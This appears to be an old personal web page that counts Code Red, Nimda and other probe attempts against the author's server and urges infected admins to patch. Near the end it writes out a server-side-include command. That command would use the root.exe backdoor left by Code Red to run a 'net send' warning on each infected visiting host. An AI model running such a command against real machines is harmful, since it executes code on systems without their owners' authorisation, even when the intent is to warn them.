Code Red Attacks ?!


Hm, it is time to protect your webserver: either apply the patch or install a real OS and web server.
Please think of the others!



Local system date: Thursday, 29-Jul-2010 21:18:08 CEST
Browser you are using: CCBot/1.0 (+http://www.commoncrawl.org/bot.html)
IP number you use: 38.107.191.94
Origin: (none)
Hits before you



Last few Code Red users:




Last few Nimda-infected users:

Opening the log file at Tuesday 10 October 2006 23:30:01

CODE RED (new version)
-- date --- count
-------------------
summary: 0

CODE RED (old version)
-- date --- count
-------------------
summary: 0

NIMDA Virus attack !
-- date --- count
-------------------
summary: 0

SUMTHIN SSL probe !
-- date --- count
13/Apr/2006 1
01/Aug/2006 1
02/Aug/2006 1
04/Aug/2006 1
06/Aug/2006 1
08/Aug/2006 1
15/Aug/2006 1
17/Aug/2006 3
26/Aug/2006 1
05/Jul/2006 1
11/Jul/2006 1
23/Jul/2006 1
26/Jul/2006 1
12/Jun/2006 1
11/May/2006 2
24/May/2006 1
01/Sep/2006 1
05/Sep/2006 1
06/Sep/2006 1
19/Sep/2006 2
27/Sep/2006 1
-------------------
summary: 25

IE6 XP Office !
-- date --- count
05/Apr/2006 2
06/Apr/2006 1
07/Apr/2006 3
08/Apr/2006 1
09/Apr/2006 1
10/Apr/2006 1
11/Apr/2006 1
12/Apr/2006 1
13/Apr/2006 2
14/Apr/2006 1
15/Apr/2006 1
16/Apr/2006 3
17/Apr/2006 1
18/Apr/2006 1
19/Apr/2006 1
20/Apr/2006 2
21/Apr/2006 2
22/Apr/2006 6
23/Apr/2006 1
24/Apr/2006 1
25/Apr/2006 2
26/Apr/2006 1
27/Apr/2006 1
28/Apr/2006 1
29/Apr/2006 1
30/Apr/2006 1
01/Aug/2006 1
02/Aug/2006 1
03/Aug/2006 1
04/Aug/2006 1
05/Aug/2006 1
06/Aug/2006 2
07/Aug/2006 1
08/Aug/2006 2
09/Aug/2006 1
10/Aug/2006 1
11/Aug/2006 3
12/Aug/2006 1
13/Aug/2006 1
14/Aug/2006 1
15/Aug/2006 2
16/Aug/2006 7
17/Aug/2006 2
18/Aug/2006 4
19/Aug/2006 4
20/Aug/2006 4
21/Aug/2006 1
22/Aug/2006 3
23/Aug/2006 1
24/Aug/2006 1
25/Aug/2006 2
26/Aug/2006 1
27/Aug/2006 1
28/Aug/2006 1
29/Aug/2006 1
30/Aug/2006 1
31/Aug/2006 1
01/Jul/2006 1
02/Jul/2006 1
03/Jul/2006 1
04/Jul/2006 1
05/Jul/2006 4
06/Jul/2006 1
07/Jul/2006 1
08/Jul/2006 1
09/Jul/2006 2
10/Jul/2006 1
11/Jul/2006 2
12/Jul/2006 2
13/Jul/2006 1
14/Jul/2006 2
15/Jul/2006 6
16/Jul/2006 2
17/Jul/2006 2
18/Jul/2006 3
19/Jul/2006 1
20/Jul/2006 1
21/Jul/2006 1
22/Jul/2006 1
23/Jul/2006 1
24/Jul/2006 2
25/Jul/2006 1
26/Jul/2006 1
27/Jul/2006 2
28/Jul/2006 1
29/Jul/2006 1
30/Jul/2006 1
31/Jul/2006 3
01/Jun/2006 1
02/Jun/2006 1
03/Jun/2006 1
04/Jun/2006 1
05/Jun/2006 1
06/Jun/2006 1
07/Jun/2006 3
08/Jun/2006 2
09/Jun/2006 1
10/Jun/2006 1
11/Jun/2006 2
12/Jun/2006 2
13/Jun/2006 1
14/Jun/2006 3
15/Jun/2006 3
16/Jun/2006 2
17/Jun/2006 1
18/Jun/2006 1
19/Jun/2006 1
20/Jun/2006 1
21/Jun/2006 1
22/Jun/2006 2
23/Jun/2006 1
24/Jun/2006 1
25/Jun/2006 1
26/Jun/2006 1
27/Jun/2006 1
28/Jun/2006 1
29/Jun/2006 1
30/Jun/2006 1
01/May/2006 1
02/May/2006 1
03/May/2006 2
04/May/2006 2
05/May/2006 1
06/May/2006 1
07/May/2006 1
08/May/2006 1
09/May/2006 3
10/May/2006 2
11/May/2006 1
12/May/2006 1
13/May/2006 1
14/May/2006 1
15/May/2006 2
16/May/2006 1
17/May/2006 1
18/May/2006 3
19/May/2006 1
20/May/2006 1
21/May/2006 2
22/May/2006 2
23/May/2006 1
24/May/2006 1
25/May/2006 2
26/May/2006 1
27/May/2006 2
28/May/2006 2
29/May/2006 2
30/May/2006 2
31/May/2006 1
01/Oct/2006 1
02/Oct/2006 1
03/Oct/2006 4
04/Oct/2006 4
05/Oct/2006 1
06/Oct/2006 2
07/Oct/2006 1
08/Oct/2006 1
09/Oct/2006 1
10/Oct/2006 1
01/Sep/2006 4
02/Sep/2006 1
03/Sep/2006 1
04/Sep/2006 1
05/Sep/2006 3
06/Sep/2006 1
07/Sep/2006 1
08/Sep/2006 1
09/Sep/2006 1
10/Sep/2006 1
11/Sep/2006 3
12/Sep/2006 1
13/Sep/2006 1
14/Sep/2006 3
15/Sep/2006 1
16/Sep/2006 2
17/Sep/2006 2
18/Sep/2006 2
19/Sep/2006 1
20/Sep/2006 6
21/Sep/2006 1
22/Sep/2006 1
23/Sep/2006 1
24/Sep/2006 1
25/Sep/2006 2
26/Sep/2006 1
27/Sep/2006 1
28/Sep/2006 2
29/Sep/2006 1
30/Sep/2006 1
-------------------
summary: 299

Ready at 23:32:21 so computing took 2 Minutes and 20 seconds

Now we could execute:
<--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location\).%22"-->

On the above-mentioned servers... oops...

Old list up to 28 Sept 2001
Old list up to 01 June 2002
Old list up to 01 July 2003